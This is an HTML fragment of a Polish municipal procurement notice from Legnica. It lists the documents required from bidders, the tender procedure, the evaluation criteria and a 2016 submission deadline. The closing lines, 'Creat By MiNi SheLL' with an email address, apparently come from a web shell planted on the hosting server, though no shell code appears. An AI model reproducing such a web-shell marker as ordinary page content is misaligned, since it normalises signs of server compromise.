<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty dotyczące urządzeń np. karty produktów, katalogi, opisy producenta, itp. w języku polskim lub angielskim wraz z tłumaczeniem na język polski.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.   Formularz oferty wg załączonego druku  Rozdziału  Nr 1.
2.  Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a  w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust 1 pkt 2) ustawy Pzp. Aktualny odpis winien określać miejsce rejestracji, formę prawną, pełny adres siedziby Wykonawcy, nazwę organu uprawnionego do reprezentowania Wykonawcy, sposób reprezentacji Wykonawcy oraz dane osób upoważnionych do składania oświadczeń w imieniu Wykonawcy. W przypadku reprezentowania Wykonawcy przez pełnomocników załącza on dokument pełnomocnictwa podpisany przez osoby upoważnione do reprezentowania i podpisywania oświadczeń w imieniu Wykonawcy zgodnie z dokumentem rejestracyjnym. W przypadku niezgodności wpisu ze stanem faktycznym Wykonawca musi złożyć dokument sporządzony przez jego właściwy organ, a uprawniający daną osobę lub osoby do reprezentowania Wykonawcy na zewnątrz.  
3. Oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu z art. 22 ust.1 ustawy Pzp wg załącznika nr 1 do Instrukcji dla Wykonawców.
4.  Oświadczenie Wykonawcy - wskazanie części zamówienia, której wykonanie powierzy podwykonawcom - wg załącznika nr 5 do Instrukcji dla Wykonawców.
5.   Oświadczenie Wykonawcy na przyjęcie warunków zmian w umowie - wg załącznika nr 6 do Instrukcji dla Wykonawców - Rozdział 2 siwz.
6. Wykaz cen  - wg załącznika nr 8 do Instrukcji dla Wykonawców - Rozdział 2 siwz.
7.  Wypełnioną umowę  wg Rozdziału Nr  3 siwz -  wypełnienie  i  akceptacja   umowy  nie  stanowi zobowiązań   prawnych ze strony Zamawiającego.
8. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia pełnomocnictwo, w którym Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanowią i wskażą Zamawiającemu pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowanie w postępowaniu i zawarcie umowy w sprawie zamówienia publicznego. Pełnomocnictwo będzie podpisane przez osoby upoważnione do reprezentowania i podpisywania oświadczeń w imieniu Wykonawców zgodnie z dokumentami rejestracyjnymi. W przypadku niezgodności wpisu ze stanem faktycznym Wykonawcy każdy Wykonawca musi złożyć dokumenty sporządzone przez jego właściwy organ, a uprawniający daną osobę lub osoby do reprezentowania Wykonawcy i podpisywania oświadczeń w imieniu Wykonawców.
9. W sytuacji gdy Wykonawca, zgodnie z art. 26  ust 2b w zakresie warunków określonych w pkt. 13 Instrukcji dla Wykonawców-Rozdział 2 siwz polegał będzie na wiedzy i doświadczeniu lub  osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru  prawnego łączących go z nim stosunków, pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji  niezbędnych zasobów na okres korzystania  z nich przy wykonaniu zamówienia.
10.  Dowód wpłacenia/ wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji (min 2 lata - max. 5 lat) - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z zapisami załącznika WARUNKI ZMIAN W UMOWIE - załącznik nr 6 do Instrukcji dla Wykonawców- Rozdział 2 siwz.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.bip.legnica.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Legnica, Plac Słowiański 7 , pokój nr 22- Referat Zamówień  Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.04.2016 godzina 10:00, miejsce: Urząd Miasta Legnica, Plac Słowiański 8 , pokój nr 208.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com